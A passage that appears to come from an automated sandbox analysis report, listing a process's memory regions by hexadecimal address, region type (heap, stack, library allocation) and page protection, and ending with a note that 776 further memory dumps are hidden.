trusted library allocation
page read and write
1C0C1DB2000
heap
page read and write
1C0C1D55000
heap
page read and write
BFFC7FF000
stack
page read and write
1FB20002000
trusted library allocation
page read and write
404000
unkown
page write copy
1C0C1DBB000
heap
page read and write
1B82A6C8000
heap
page read and write
1C0C1D73000
heap
page read and write
1C0C1DBB000
heap
page read and write
24B9EEF0000
heap
page read and write
30000
heap
page read and write
265B80B7000
trusted library allocation
page read and write
20CBCE28000
heap
page read and write
20E35892000
heap
page read and write
265C0920000
heap
page read and write
265B80B1000
trusted library allocation
page read and write
265C0820000
heap
page read and write
20E35800000
heap
page read and write
265A6630000
trusted library allocation
page read and write
1C0C3640000
heap
page read and write
1C0C1D88000
heap
page read and write
1C8C62B0000
heap
page readonly
7FFBAE850000
trusted library allocation
page read and write
7FFBAE726000
trusted library allocation
page execute and read and write
1FE4AE80000
heap
page read and write
1C0C3570000
trusted library allocation
page read and write
265A6663000
trusted library allocation
page read and write
There are 776 hidden memdumps, click here to show them.